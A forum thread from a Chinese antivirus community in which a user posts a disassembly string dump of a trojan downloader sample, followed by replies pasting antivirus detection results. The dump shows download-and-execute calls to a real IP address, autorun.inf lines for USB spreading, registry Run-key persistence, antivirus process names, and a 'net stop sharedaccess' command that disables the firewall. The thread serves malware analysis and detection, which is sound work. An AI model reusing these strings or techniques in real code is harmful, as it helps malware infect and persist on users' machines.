查看: 3026|回复: 11
收起左侧

autorun下载者兼皮炎平fbb09a

[复制链接]
promised
发表于 2007-9-14 19:57:24 | 显示全部楼层 |阅读模式
  1. 0040444C ASCII "SeDebugPrivilege"
  2. 0040445C ASCII 0
  3. 00404525 MOV EAX,999.00404608 ASCII "360tray.exe"
  4. 0040455B MOV EAX,999.0040461C ASCII "360safe.exe"
  5. 004045A8 MOV EAX,999.00404630 ASCII "avp.exe"
  6. 00404608 ASCII "360tray.exe",0
  7. 0040461C ASCII "360safe.exe",0
  8. 00404630 ASCII "avp.exe",0
  9. 00404638 PUSH 999.0040474C ASCII "shell32.dll"
  10. 00404647 PUSH 999.00404758 ASCII "ShellExecuteA"
  11. 0040465C PUSH 999.00404768 ASCII "plmmsbl.dll"
  12. 0040466B PUSH 999.00404774 ASCII "URLDownloadToFileA"
  13. 00404684 PUSH 999.00404788 ASCII "C:\a.exe"
  14. 00404689 PUSH 999.00404794 ASCII "http://218.61.18.175/hao.exe"
  15. 0040469E PUSH 999.00404788 ASCII "C:\a.exe"
  16. 004046A3 PUSH 999.004047D8 ASCII "open"
  17. 004046BE PUSH 999.004047E0 ASCII "C:\b.exe"
  18. 004046C3 PUSH 999.004047EC ASCII "http://218.61.18.175/wei.exe"
  19. 004046D8 PUSH 999.004047E0 ASCII "C:\b.exe"
  20. 004046DD PUSH 999.004047D8 ASCII "open"
  21. 004046F8 PUSH 999.00404830 ASCII "C:\c.exe"
  22. 004046FD PUSH 999.0040483C ASCII "http://218.61.18.175/haowei.exe"
  23. 00404712 PUSH 999.00404830 ASCII "C:\c.exe"
  24. 00404717 PUSH 999.004047D8 ASCII "open"(就是前面发的a与b)
  25. a 0040474C ASCII "shell32.dll",0
  26. 00404758 ASCII "ShellExecuteA",0
  27. 00404768 ASCII "plmmsbl.dll",0
  28. 00404774 ASCII "URLDownloadToFil"
  29. 00404784 ASCII "eA",0
  30. 00404788 ASCII "C:\a.exe",0
  31. 00404794 ASCII "http://218.61.18"
  32. 004047A4 ASCII ".175/hao.exe",0
  33. 004047D8 ASCII "open",0
  34. 004047E0 ASCII "C:\b.exe",0
  35. 004047EC ASCII "http://218.61.18"
  36. 004047FC ASCII ".175/wei.exe",0
  37. 00404830 ASCII "C:\c.exe",0
  38. 0040483C ASCII "http://218.61.18"
  39. 0040484C ASCII ".175/haowei.exe",0
  40. 004048CA PUSH 999.0040496C ASCII "svchost.exe"
  41. 0040496C ASCII "svchost.exe",0
  42. 004049A3 PUSH 999.00404A98 ASCII "Software\Microsoft\Windows\CurrentVersion\policies\explorer"
  43. 004049B6 PUSH 999.00404AD4 ASCII "run"
  44. 004049C7 MOV ECX,999.00404AE0 ASCII "\dream.exe"
  45. 004049EF PUSH 999.00404AEC ASCII "melove"
  46. 00404A2D PUSH 999.00404AF4 ASCII "Software\Microsoft\Windows\CurrentVersion\policies\explorer\run"
  47. 00404A49 PUSH 999.00404B34 ASCII "dream"
  48. 00404A98 ASCII "Software\Microso"
  49. 00404AA8 ASCII "ft\Windows\Curre"
  50. 00404AB8 ASCII "ntVersion\polici"
  51. 00404AC8 ASCII "es\explorer",0
  52. 00404AD4 ASCII "run",0
  53. 00404AE0 ASCII "\dream.exe",0
  54. 00404AEC ASCII "melove",0
  55. 00404AF4 ASCII "Software\Microso"
  56. 00404B04 ASCII "ft\Windows\Curre"
  57. 00404B14 ASCII "ntVersion\polici"
  58. 00404B24 ASCII "es\explorer\run",0
  59. 00404B34 ASCII "dream",0
  60. 00404C5B MOV EAX,999.00404E6C ASCII "OD"
  61. 00404E6C ASCII "OD",0
  62. 00404F48 MOV EDX,999.00404FB4 ASCII "#32770"
  63. 00404FB4 ASCII "#32770",0
  64. 0040501C MOV ECX,999.0040533C ASCII "\sbl.inf"
  65. 0040504A MOV ECX,999.00405350 ASCII "\sbl.inf.inf"
  66. 00405090 MOV EDX,999.00405368 ASCII "[autorun]"
  67. 004050AA MOV EDX,999.0040537C ASCII "OPEN=sb.exe"
  68. 004050C4 MOV EDX,999.00405390 ASCII "shellexecute=sb.exe"
  69. 004050DE MOV EDX,999.004053AC ASCII "shell\Auto\command=sb.exe"
  70. 004050F8 MOV EDX,999.004053D0 ASCII "shell=open"
  71. 004051B5 MOV EDX,999.004053E8 ASCII ":\autorun.inf"
  72. 004051E5 MOV EDX,999.00405400 ASCII ":\ah.exe"
  73. 0040522E MOV EDX,999.004053E8 ASCII ":\autorun.inf"
  74. 0040524A MOV ECX,999.0040533C ASCII "\sbl.inf"
  75. 00405280 MOV EDX,999.004053E8 ASCII ":\autorun.inf"
  76. 004052B0 MOV EDX,999.00405400 ASCII ":\ah.exe"
  77. 0040533C ASCII "\sbl.inf",0
  78. 00405350 ASCII "\sbl.inf.inf",0
  79. 00405368 ASCII "[autorun]",0
  80. 0040537C ASCII "OPEN=sb.exe",0
  81. 00405390 ASCII "shellexecute=sb."
  82. 004053A0 ASCII "exe",0
  83. 004053AC ASCII "shell\Auto\comma"
  84. 004053BC ASCII "nd=sb.exe",0
  85. 004053D0 ASCII "shell=open",0
  86. 004053E8 ASCII ":\autorun.inf",0
  87. 00405400 ASCII ":\ah.exe",0
  88. 00405467 MOV ECX,999.004054FC ASCII "\dream.exe"
  89. 00405487 MOV ECX,999.004054FC ASCII "\dream.exe"
  90. 004054FC ASCII "\dream.exe",0
  91. 00405592 PUSH 999.00405610 ASCII "Shell32.dll"
  92. 004055A1 PUSH 999.0040561C ASCII "ShellExecuteA"
  93. 004055C5 PUSH 999.0040562C ASCII "open"
  94. 00405610 ASCII "Shell32.dll",0
  95. 0040561C ASCII "ShellExecuteA",0
  96. 0040562C ASCII "open",0
  97. 004056DB PUSH 999.004057F4 ASCII "omylovesbl"
  98. 004056F3 JE 999.004057CA (初始 CPU 选择)
  99. 00405700 PUSH 999.00405800 ASCII "cmd.exe /c net stop sharedaccess"(结束防火墙)
  100. 00405740 MOV ECX,999.0040582C ASCII "\plmmsbl.dll"
  101. 0040575C MOV ECX,999.00405844 ASCII "\urlmon.dll"
  102. 004057F4 ASCII "omylovesbl",0
  103. 00405800 ASCII "cmd.exe /c net s"
  104. 00405810 ASCII "top sharedaccess"
  105. 00405820 ASCII 0
  106. 0040582C ASCII "\plmmsbl.dll",0
  107. 00405844 ASCII "\urlmon.dll",0
复制代码


[ 本帖最后由 promised 于 2007-9-14 20:05 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
nosferatu
头像被屏蔽
发表于 2007-9-14 20:01:35 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\999.rar'
C:\Documents and Settings\Administrator\桌面\999.rar
  [0] Archive type: RAR
  --> 999.exe
      [DETECTION] Is the Trojan horse TR/Agent.25600.27
      [INFO]      The file was deleted!


End of the scan: 2007年9月14日  20:01
Used time: 00:16 min

The scan has been done completely.
微点卫士
发表于 2007-9-14 20:07:44 | 显示全部楼层
微点竟然退出了,上报啊
promised
 楼主| 发表于 2007-9-14 20:08:08 | 显示全部楼层

回复 3楼 微点卫士 的帖子

微点卫士
发表于 2007-9-14 20:11:25 | 显示全部楼层

回复 4楼 promised 的帖子

现在解压时居然报了,
微点在玩我
木马名称:未知间谍软件

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\999.EXE
是木马程序!
已成功阻止其运行,是否
要删除此文件?

但是如果选择不删除,运行,微点在托盘里就没了
qigang
发表于 2007-9-14 20:12:18 | 显示全部楼层
好像有人发过了。。
红心王子
发表于 2007-9-14 20:13:57 | 显示全部楼层
2007-9-14        20:13:31        1189772011        Administrator        2404        Sign of "Win32:Agent-KNZ [Trj]" has been found in "C:\Documents and Settings\Administrator\桌面\999.rar\999.exe" file.
1688388728
发表于 2007-9-14 20:15:59 | 显示全部楼层
卡巴斯基互联网安全套装 7.0
The requested URL http://bbs.kafan.cn/attachment.php?aid=127619 is infected with Heur.Trojan.Generic virus
kp2006
头像被屏蔽
发表于 2007-9-14 20:28:21 | 显示全部楼层
Trojan.Win32.Agent.yil
taihuxian
发表于 2007-9-14 20:41:23 | 显示全部楼层
BitDefender

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The blocked web page included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-3-1 09:03 , Processed in 0.087118 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表